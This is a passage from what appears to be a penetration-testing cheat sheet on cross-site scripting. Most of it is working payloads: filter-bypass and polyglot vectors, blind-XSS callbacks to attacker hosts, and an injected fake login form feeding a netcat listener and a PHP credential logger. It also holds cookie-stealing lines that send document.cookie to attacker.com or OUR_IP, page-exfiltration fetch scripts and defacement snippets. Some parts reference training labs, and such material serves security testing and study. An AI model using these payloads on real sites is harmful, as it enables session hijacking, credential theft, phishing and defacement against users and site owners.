"><svg><animate onbegin=event/>⁄<set attributeName=onerror/to=alert`1`
<svg onload="a=domain,b=confirm,c=window,c.onerror=b;throw a">
<svg id=javascript:alert(1) onload=location=id>
<0 name="<svg/onload=alert()>">
<cool/onpointermove=(confirm)(1)>MoveMouseHere
Payload;"style="width:100%;height:10000px;background:red" onmouseover="alert(origin)
<a href="javascript:alert/**/('1')">click</a>
<script>alert/**/('2')</script>
<svg><script>ale<!-- -->rt('3')</script></svg>
<svg><script>ale<//looks like js comment>rt('3')</script></svg>
<img/src/onerror="alert/* */('4')">
```

## Tiny XSS

```javascript
<base/href=//NJ.₨>
<svg/onload=eval(name)>
<style/onload=eval(name)>
<svg/onload=eval(`'`+URL)>
<svg/onload=location=name>
<style/onerror=eval(name)>
<script/src=//NJ.₨></script>
<svg/onload=import(/\NJ.₨/)>
<iframe/onload=src=top.name>
<svg><svg/onload=eval(name)>
<style/onload=eval(`'`+URL)>
<iframe/onload=eval(`'`+URL)>
<style/onload=import(/\NJ.₨/)>
<audio/src/onerror=eval(name)>
<iframe/onload=import(/\NJ.₨/)>
<img/src/onerror=eval(`'`+URL)>
<iframe/onload=src=top[0].name+/\NJ.₨/>
<iframe/srcdoc="<svg><script/href=//NJ.₨ />">
<iframe/onload=src=contentWindow.name+/\NJ.₨/>
<iframe/srcdoc="<script/src=//NJ.₨></script>">
```

{% embed url="<https://tinyxss.terjanq.me/>" %}

## Stored XSS

```html
<script>alert(window.origin)</script>
```

{% hint style="success" %}
***Tip:** Many modern web applications utilize cross-domain IFrames to handle user input, so that even if the web form is vulnerable to XSS, it would not be a vulnerability on the main web application. This is why we are showing the value of `window.origin` in the alert box, instead of a static value like `1`. In this case, the alert box would reveal the URL it is being executed on, and will confirm which form is the vulnerable one, in case an IFrame was being used.*
{% endhint %}

```
<script>print()</script>
```

&#x20;Will pop up the browser print dialog, which is unlikely to be blocked by any browser

### Cookies

```
<script>alert(document.cookie)</script>
```

## Reflected XSS

```html
<div></div><ul class="list-unstyled" id="todo"><div style="padding-left:25px">Task '<script>alert(window.origin)</script>' could not be added.</div></ul>
```

The single quotes contain our XSS payload `'<script>alert(window.origin)</script>'`.

`GET` request sends their parameters and data as part of the URL. So, `to target a user, we can send them a URL containing our payload`.

```
http://URL/index.php?task=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
```

## DOM XSS

Sink:

* `document.write()`
* `DOM.innerHTML`
* `DOM.outerHTML`

### Document Sink

```
someDOMElement.innerHTML
someDOMElement.outerHTML
someDOMElement.insertAdjacentHTML
document.write()
document.writeln()
```

### Location Sink

```
document.location
window.location.assign()
window.location.replace()
```

### Execution Sink

```
eval()
setTimeout()
setInterval()
Function()
```

### DOM Source

A source is a JavaScript property that accepts data that is potentially attackercontrolled

```
document.URL
document.documentURI
document.URLUnencoded
document.baseURI
location
location.search
document.cookie
document.referrer
window.name
history.pushState
history.replaceState
localStorage
sessionStorage
```

jQuery:

* `add()`
* `after()`
* `append()`

```javascript
var pos = document.URL.indexOf("task=");
var task = document.URL.substring(pos + 5, document.URL.length);
```

```javascript
document.getElementById("todo").innerHTML = "<b>Next Task:</b> " + decodeURIComponent(task);
```

`innerHTML` function does not allow the use of the `<script>` tags within it as a security feature

Payload:

```html
<img src="" onerror=alert(window.origin)>
```

```
# Open Redirect
Ex: https://example.com/redirect?url=jav%20ascri%20pt:alert(1)
# Simple bypasses
javascript:alert(1)
JavaScript:alert(1)
JAVASCRIPT:alert(1)

# Bypass weak regex patterns (try repositioning the URL-encoded special characters)
ja%20vascri%20pt:alert(1)
jav%0Aascri%0Apt:alert(1)
jav%0Dascri%0Dpt:alert(1)
jav%09ascri%09pt:alert(1)

# More advanced weak regex pattern bypasses
%19javascript:alert(1)
javascript://%0Aalert(1)
javascript://%0Dalert(1)
javascript://https://example.com%0Aalert(1)
```

```
https://example.com/index.php/x' oncontentvisibilityautostatechange=alert(1) style='display:block;content-visibility:auto
```

### Bypass Dom Purify - [Mutated XSS](#mxss-mutated-xss)

### Dom-Explorer

{% embed url="<https://yeswehack.github.io/Dom-Explorer/#eyJpbnB1dCI6IiIsInBpcGVsaW5lcyI6W3siaWQiOiJpOGxpMDF3MCIsIm5hbWUiOiJEb20gVHJlZSIsInBpcGVzIjpbeyJuYW1lIjoiRG9tUGFyc2VyIiwiaWQiOiIxN3hmb3V2MSIsImhpZGUiOmZhbHNlLCJza2lwIjpmYWxzZSwib3B0cyI6eyJ0eXBlIjoidGV4dC9odG1sIiwic2VsZWN0b3IiOiJib2R5Iiwib3V0cHV0IjoiaW5uZXJIVE1MIiwiYWRkRG9jdHlwZSI6dHJ1ZX19XX1dfQ==>" %}

### Burp

{% embed url="<https://portswigger.net/burp/documentation/desktop/tools/dom-invader>" %}

### Firefox Extension

{% embed url="<https://github.com/swoops/eval_villain>" %}

Dom Logger ++ - See [Burp extensions](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/burp)

{% embed url="<https://mizu.re/post/exploring-the-dompurify-library-hunting-for-misconfigurations>" %}

### Chrome extension

{% embed url="<https://github.com/filedescriptor/untrusted-types>" %}

## Blind XSS

{% embed url="<https://canarytokens.org/nest/?s=03>" %}

Blind XSS Scanner

{% embed url="<https://github.com/ethicalhackingplayground/bxss>" %}

### ezXSS

{% embed url="<https://github.com/ssl/ezXSS>" %}

### BeeXSS

{% embed url="<https://github.com/AnonKryptiQuz/BeeXSS>" %}

### XSSHunter

{% embed url="<https://github.com/trufflesecurity/xsshunter>" %}

{% embed url="<https://blog.intigriti.com/hacking-tools/hacker-tools-xsshunter>" %}

### BXSS HUnter

{% embed url="<https://bxsshunter.com/>" %}

### KNOXSS

Create a demo account: <https://knoxss.me/>

**Blind XSS Custom Vector - Default**

```
<Script /Src=https://X55.is?1=[YOUR_ID]></Script>
```

**Blind XSS Custom Vector - Short Polyglot (HTML & JS Main Cases)**

```
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is?1=[YOUR_ID]/.source))//>
```

**Blind XSS Custom Vector - Full Polyglot (20+ XSS Cases)**

```
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is?1=[YOUR_ID]/.source))}//\76-->
```

## XSS Discovery

### Burp, Nessus, ZAP

### [Tools](#tools-1)

### Nuclei Template

<https://raw.githubusercontent.com/coffinxp/priv8-Nuclei/refs/heads/main/reflection.yaml>

```yaml
id: reflection
info:
    name: search for reflection in header and body
    author: roninja
    severity: low
    description: Potential Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF) attacks, Cache Poisoning and Open URL Redirection.
    reference:
      - https://{{Hostname}}.{{interactsh-url}}
    tags: reflection,header,cookies
    metadata:
      max-request: 2
requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36
        Referer: https://r.{{Host}}.{{interactsh-url}}
        Origin: https://o.{{Host}}.{{interactsh-url}}
        Location: https://l.{{Host}}.{{interactsh-url}}
        X-Forwarded-Host: xfh.{{Host}}.{{interactsh-url}}
        X-Forwarded-For: xff.{{Host}}.{{interactsh-url}}
        X-Host: xh.{{Host}}.{{interactsh-url}}
        X-Original-Host: xoh.{{Host}}.{{interactsh-url}}
        X-Original-URL: xou.{{Host}}.{{interactsh-url}}
        Cookie: gude=tama.{{interactsh-url}}
        Gudetama: {{interactsh-url}}
        Accept-Encoding: gzip, deflate, br, zstd

      - |
        GET / HTTP/1.1
        Host: {{Host}}.{{interactsh-url}}
        User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36
        Cookie: gude=tama.{{interactsh-url}}
        Set-Cookie: gude=tama.{{interactsh-url}}
        Accept-Encoding: gzip, deflate, br, zstd

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36
        Cookie: gude=tama.{{interactsh-url}}
        Set-Cookie: gude=tama.{{interactsh-url}}
        Accept-Encoding: gzip, deflate, br, zstd
    
    redirects: false
    stop-at-first-match: false
    matchers-condition: or
    matchers:
      - type: regex
        regex:
          - '(?m)^(?:(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(gude=tama)(?:\s*?)(?:$|;))'
          - '(?mi)^(.*:\s*.*oast.*)'
        part: header

      - type: regex
        regex:
          - '(?m)^(?:(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(gude=tama)(?:\s*?)(?:$|;))'
          - '(?mi)^(.*:\s*.*oast.*)'
        part: body

```

### Open Source

{% embed url="<https://github.com/s0md3v/XSStrike>" %}

```shell-session
python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test" 
```

{% embed url="<https://github.com/rajeshmajumdar/BruteXSS>" %}

{% embed url="<https://github.com/epsylon/xsser>" %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FRatVgMSaoFGhe39IFk1I%2Fimage.png?alt=media&#x26;token=c3441318-fcd7-488b-9379-02b5c1f1f174" alt=""><figcaption></figcaption></figure>

Other great tool:

{% embed url="<https://github.com/hahwul/dalfox>" %}

Release Page - build in - Just download&#x20;

### Commercial Tool

* <https://knoxss.me/>  + firefox extension Knoxss
* <https://store.xss0r.com/>
* See [Blind XSS](#blind-xss)

### Manual

See [Payload](#payload)

{% hint style="info" %}
Note: XSS can be injected into any input in the HTML page, which is not exclusive to HTML input fields, but may also be in HTTP headers like the Cookie or User-Agent (i.e., when their values are displayed on the page).
{% endhint %}

## Defacing

Three HTML elements are usually utilized to change the main look of a web page:

* Background Color `document.body.style.background`
* Background `document.body.background`
* Page Title `document.title`
* Page Text `DOM.innerHTML`

### Changing Background

```html
<script>document.body.style.background = "#141d2b"</script>
```

{% hint style="info" %}
Here we set the background color to the default Hack The Box background color. We can use any other hex value, or can use a named color like `= "black"`.
{% endhint %}

```
# Change background color to red
<img src="test" onmouseover="document.body.style.backgroundColor = 'red'">
```

```html
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>
```

### Changing Page Title

```html
<script>document.title = 'HackTheBox Academy'</script>
```

```
# Title defacement
<script>document.getElementById('thm-title').innerHTML="I am a hacker";</script>
```

### Changing Page Text

```javascript
document.getElementById("todo").innerHTML = "New Text"
```

jQuery

```javascript
$("#todo").html('New Text');
```

innerHTML

```javascript
document.getElementsByTagName('body')[0].innerHTML = "New Text"
```

&#x20;`document.getElementsByTagName('body')` => by specifying `[0]`, we are selecting the first `body` element, which should change the entire text of the web page

```html
<script>document.getElementsByTagName('body')[0].innerHTML = '<center><h1 style="color: white">Cyber Security Training</h1><p style="color: white">by <img src="https://academy.hackthebox.com/images/logo-htb.svg" height="25px" alt="HTB Academy"> </p></center>'</script>
```

## Phishing

{% hint style="info" %}
Tip: To understand which payload should work, try to view how your input is displayed in the HTML source after you add it.
{% endhint %}

### Login Form Injection

Login form:

```html
<h3>Please login to continue</h3>
<form action=http://OUR_IP>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>
```

Payload:

```javascript
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
```

Vicitm URL: <http://SERVER\\_IP/phishing/index.php?url=...SNIP>...

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FK7ybMnddmjNF3opoVdsx%2Fimage.png?alt=media&#x26;token=9db31b6b-1201-4e5c-9b24-3b61d85620f3" alt=""><figcaption></figcaption></figure>

Remove the URL field, such that they may think that they have to log in to be able to use the page. To do so, we can use the JavaScript function `document.getElementById().remove()` function.

&#x20;Find the `id` of the HTML element we want to remove:

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FUUwjXa9tTI2KpTqoesGt%2Fimage.png?alt=media&#x26;token=22b892fc-cd65-493f-9555-5ad91008efcf" alt=""><figcaption></figcaption></figure>

```javascript
document.getElementById('urlform').remove();
```

Final Payload:

```javascript
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F3orG3sKUkmt0viQyOywo%2Fimage.png?alt=media&#x26;token=79d0e912-0e0a-49c0-b381-d12bf94fe4ec" alt=""><figcaption></figcaption></figure>

Remove  the original HTML code left after our injected login form

```html
...PAYLOAD... <!-- 
```

### Credential Stealing

&#x20;If any victim attempts to log in with the form, we will get their credentials.

```shell-session
 sudo nc -lvnp 80
```

```shell-session
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.XX.XX] XXXXX
GET /?username=test&password=test&submit=Login HTTP/1.1
Host: 10.10.XX.XX
...SNIP...
```

Use a basic PHP script that logs the credentials from the HTTP request and then returns the victim to the original page without any injections

index.php:

```php
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>
```

&#x20;Start a `PHP` listening server,

```shell-session
$ mkdir /tmp/tmpserver
$ cd /tmp/tmpserver
$ vi index.php #at this step we wrote our index.php file
$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started
```

### Blind XSS Detection

{% embed url="<https://www.intigriti.com/researchers/blog/hacking-tools/hunting-for-blind-cross-site-scripting-xss-vulnerabilities-a-complete-guide>" %}

{% embed url="<https://canarytokens.org/nest/?s=03>" %}

Payload Generator:

{% embed url="<https://github.com/jadu101/blind_xss_payload_generator/tree/main?s=03>" %}

```html
<script src="http://OUR_IP/script.js"></script>
```

Identify the vulnerable input field that executed the script

```html
<script src="http://OUR_IP/username"></script>
```

If we get a request for `/username`, then we know that the `username` field is vulnerable to XSS, and so on.

{% hint style="success" %}
*Also check* [*Polyglot XSS payload*](https://medium.com/@0xAwali/let-me-bxss-em-all-72832064dd83)
{% endhint %}

```javascript
<img src="http://example.burpcollaborator.net/image">
<img src="http://example.burpcollaborator.net/image-only" onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
<img src=x onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
<img src=x onerror='this.src="http://"+btoa(document.location)+".example.burpcollaborator.net/image-dns?"'>
<img src=x onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
<img src=x onerror='fetch("http://example.burpcollaborator.net/image-xss-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})'>
<iframe src='javascript:window.location="http://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></iframe>
<iframe srcdoc='<script>window.location="http://example.burpcollaborator.net/iframe-srcdoc?"+btoa(parent.document.location)</script>'></iframe>
<iframe srcdoc='<script>fetch("http://example.burpcollaborator.net/iframe-srcdoc-post",{method:"POST",body:btoa(parent.document.body.innerHTML),mode:"no-cors"})</script>'></iframe>
<object data='javascript:window.location="http://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></object>
<input onfocus='fetch("http://example.burpcollaborator.net/imput-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})' autofocus>
<script src=http://example.burpcollaborator.net/script-tag></script>
<script type="text/javascript" src="http://example.burpcollaborator.net/script-tag-type"></script>
<script type="module" src="http://example.burpcollaborator.net/script-tag-module"></script>
<script nomodule src="http://example.burpcollaborator.net/script-tag-nomodule"></script>
'"><img src="http://example.burpcollaborator.net/image">
'"><img src="http://example.burpcollaborator.net/image-only" onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
'"><img src=x onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
'"><img src=x onerror='this.src="http://"+btoa(document.location)+".example.burpcollaborator.net/image-dns?"'>
'"><img src=x onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
'"><img src=x onerror='fetch("http://example.burpcollaborator.net/image-xss-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})'>
'"><iframe src='javascript:window.location="http://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></iframe>
'"><iframe srcdoc='<script>window.location="http://example.burpcollaborator.net/iframe-srcdoc?"+btoa(parent.document.location)</script>'></iframe>
'"><iframe srcdoc='<script>fetch("http://example.burpcollaborator.net/iframe-srcdoc-post",{method:"POST",body:btoa(parent.document.body.innerHTML),mode:"no-cors"})</script>'></iframe>
'"><object data='javascript:window.location="http://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></object>
<input onfocus='fetch("http://example.burpcollaborator.net/imput-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})' autofocus>
'"><script src=http://example.burpcollaborator.net/script-tag></script>
'"><script type="text/javascript" src="http://example.burpcollaborator.net/script-tag-type"></script>
'"><script type="module" src="http://example.burpcollaborator.net/script-tag-module"></script>
'"><script nomodule src="http://example.burpcollaborator.net/script-tag-nomodule"></script>
javascript:window.location="http://example.burpcollaborator.net/js-scheme?"+btoa(document.location)
';"</scrpt><scrpt/src=//example.burpcollaborator.net/c/target-1></scrpt>
'//><scrIpt src=//example.burpcollaborator.net/c/kee-kee></scrIpt>
1"`/import(src)'<Script/Src=//example.burpcollaborator.net?1=[ID]><Img/OnLoad='`
--></tiTle></stYle></texTarea></scrIpt>"//'//><scrIpt src="http://example.burpcollaborator.net/"></scrIpt>
```

{% embed url="<https://www.intigriti.com/researchers/blog/hacking-tools/hunting-for-blind-cross-site-scripting-xss-vulnerabilities-a-complete-guide>" %}

```javascript
# Include your IP into the base64

<!-- Image tag -->
'"><img src="x" onerror="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">

<!-- Input tag with autofocus -->
'"><input autofocus onfocus="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">

<!-- In case jQuery is loaded, we can make use of the getScript method -->
'"><script>$.getScript("{SERVER}/script.js")</script>

<!-- Make use of the JavaScript protocol (applicable in cases where your input lands into the "href" attribute or a specific DOM sink) -->
javascript:eval(atob("Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw=="))

<!-- Render an iframe to validate your injection point and receive a callback -->
'"><iframe src="{SERVER}"></iframe>

<!-- Bypass certain Content Security Policy (CSP) restrictions with a base tag -->
<base href="{SERVER}" />

<!-- Make use of the meta-tag to initiate a redirect -->
<meta http-equiv="refresh" content="0; url={SERVER}" />

<!-- In case your target makes use of AngularJS -->
{{constructor.constructor("import('{SERVER}/script.js')")()}}
```

Payloads from PayloadsAllTheThings

```
"><script src=//OUR_IP/field_name></script>
```

```html
<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>
'"></title></textarea></script></style></noscript><script src=http://OUR_IP></script>
```

```shell-session
0xss0rz@htb[/htb]$ mkdir /tmp/tmpserver
0xss0rz@htb[/htb]$ cd /tmp/tmpserver
0xss0rz@htb[/htb]$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started
```

Now we can start testing these payloads one by one by using one of them for all of input fields and appending the name of the field after our IP

```html
<script src=http://OUR_IP/fullname></script> #this goes inside the full-name field
<script src=http://OUR_IP/username></script> #this goes inside the username field
...SNIP...
```

{% hint style="success" %}
*Tip: We will notice that the email must match an email format, even if we try manipulating the HTTP request parameters, as it seems to be validated on both the front-end and the back-end. Hence, the email field is not vulnerable, and we can skip testing it. Likewise, we may skip the password field, as passwords are usually hashed and not usually shown in cleartext. This helps us in reducing the number of potentially vulnerable input fields we need to test.*
{% endhint %}

Also see [Blind XSS](#blind-xss)

### Blind XSS in Request Header

{% content-ref url="http-header-exploitation" %}
[http-header-exploitation](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/http-header-exploitation)
{% endcontent-ref %}

Try in common header&#x20;

• Referrer
\
• X-Forwarded-For, X-Forwarded-Host, X-Forwarded-Ip, Host (in case of a reverse proxy)
\
• User-Agent
\
• Etc.

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FJChlBXlOV7IXiOb00vXQ%2Fimage.png?alt=media&#x26;token=ed519578-7aa3-4bef-9a41-fca245807f41" alt=""><figcaption></figcaption></figure>

## Session Hijacking

Payloads&#x20;

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#exploit-code-or-poc>" %}

```javascript
document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;
```

```
<script>document.location='http://OUR_IP/index.php?c='+document.cookie;</script>
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>
```

&#x20;Write any of these JavaScript payloads to `script.js`, which will be hosted on our VM &#x20;

```javascript
new Image().src='http://OUR_IP/index.php?c='+document.cookie
```

&#x20;Change the URL in the XSS payload we found earlier to use `script.js`

```html
<script src=http://OUR_IP/script.js></script>
```

If there were many cookies, we may not know which cookie value belongs to which cookie header. So, we can write a PHP script to split them with a new line and write them to a file

Save the following PHP script as `index.php`

```php
<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
```

{% embed url="<https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies>" %}

{% embed url="<https://infinitelogins.com/2020/10/13/using-cross-site-scripting-xss-to-steal-cookies/>" %}

```
# Cookie stealing example
<img src=x onerror="this.src='http://192.168.0.18:8888/?'+document.cookie; this.removeAttribute('onerror');">
```

```
<img src=’https://<attacker-server>/yikes?jwt=’+JSON.stringify(localStorage);’--!>
```

```
<img src=x encodeURIComponent(document.cookie) onerror="fetch('https://[BURP-COLLAB-ID]/' + encodeURIComponent(document.cookie))">
```

```
%3Cimg%20src%3Dx+encodeURIComponent(document.cookie)%20onerror%3D%22fetch(%27https://[BURP-COLLAB-ID]/%27%2bencodeURIComponent(document.cookie))%22%3E
```

### Redirect

```
https://accounts.reddit.com/?dest=javascript:fetch('//attacker.com?c='+btoa(document.cookie))
```

{% content-ref url="open-redirection" %}
[open-redirection](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/open-redirection)
{% endcontent-ref %}

### Bypass HTTPOnly - Sandwich Technique

{% embed url="<https://portswigger.net/research/stealing-httponly-cookies-with-the-cookie-sandwich-technique>" %}

### Extract existing page code

```javascript
<img src=x onerror="fetch('/api/info').then(r=>r.text()).then(t=>fetch('http://10.10.16.3/log?data='+encodeURIComponent(t),{mode:'no-cors'}))">
```

```javascript
<script>
fetch("http://domain.htb/index.php?page=existing_page")
.then(response => response.text()) 
.then(data => {
fetch("http://10.10.14.49/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script> 
```

If it doesn't work, try to put a js file on your webserver and fetch it:

xss.js

```javascript
fetch('/api/info')
    .then(response => response.text())  // Get the response body as text
    .then(text => {
        // Send the base64-encoded response to your server
        fetch('http://10.10.14.44/data?' + btoa(text), { mode: 'no-cors' });
    });
```

Payload:

```javascript
<img src=1 onerror="var s=document.createElement('script'); s.src='http://10.10.14.44/xss.js'; document.body.appendChild(s);">
```

## XSS in an email / username

```
"><Svg/OnLoad=alert(1)>"@gmail.com
```

XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required).

`"><img/src/onerror=import('//domain/')>"@yourdomain.com`

```
test+(<script>alert(0)</script>)@example.com
```

{% embed url="<https://twitter.com/zseano/status/1784317870282817755>" %}

## XSS in phone number

```
 +441134960000;phone-context=<script>alert(1)</script>
```

{% embed url="<https://x.com/intigriti/status/1814587805558886576?s=03&t=qgiB29Wg31VI3jmMYESgFQ>" %}

## Textarea

```
</textarea><img src="x" onerror="alert(1)">
```

## XSS in .css file

```
"/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2Fd74mbTofWU00oS1Inwm9%2FGHewhTgW4AAvqVs.jpg?alt=media&#x26;token=d36d4a3d-1ad2-428a-9b3b-815b4dc65399" alt=""><figcaption></figcaption></figure>

## XSS.SWF

{% embed url="<https://github.com/evilcos/xss.swf>" %}

```
# https://github.com/evilcos/xss.swf
<object data="//hacker.site/xss.swf">
<embed code="//hacker.site/xss.swf" allowscriptaccess=always>
```

## SVG Tag - Confuse filters

```
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
```

```svg
<svg>
  <script>
    /*
    <![CDATA[*]]><![CDATA[/]]>alert(1)-/\*/
  </script>
```

Source: <https://x.com/garethheyes/status/1843331462004912389?t=wmNCIF85tvyXZ21GMJ9B6w&s=03>

```svg
<svg> <script> 1<![CDATA[</script>]]>/-alert(1) </script> </svg>

<svg> <script> /* <![CDATA[*]]><![CDATA[/]]>alert(1)-/\*/ </script>
```

```svg
<svg><use><set attributeName="href" to="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000'&gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />
```

Source: <https://x.com/0x0SojalSec/status/1844806824983413002?t=sfLD3yJAVRjsXew1YJ40QA&s=03>

```svg
<svg>
<script>alert<![CDATA[<!---->]]>
(1)</script></svg>
```

```svg
<svg><script>
eval('a<?>l<!>e</>rt(1)')
</script></svg>
```

```svg
<svg>
<script>
<!---->a<!---->l<!---->e<!---->r<!---->t<!---->(<!---->1<!---->)
</script>
<svg>
```

## XSS Polyglots

{% embed url="<https://github.com/coffinxp/payloads/blob/main/xsspollygots.txt>" %}

{% embed url="<https://brutelogic.com.br/blog/building-xss-polyglots/>" %}

{% embed url="<https://medium.com/@0xAwali/let-me-bxss-em-all-72832064dd83>" %}

```javascript
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source), s.stack=Error().stack, s.src=(/,/+/oastify.com/).slice(2), document.documentElement.appendChild(s))//'>
```

```javascript

</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=(alert)(1337)>
/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//>
<!–>/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/;{(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
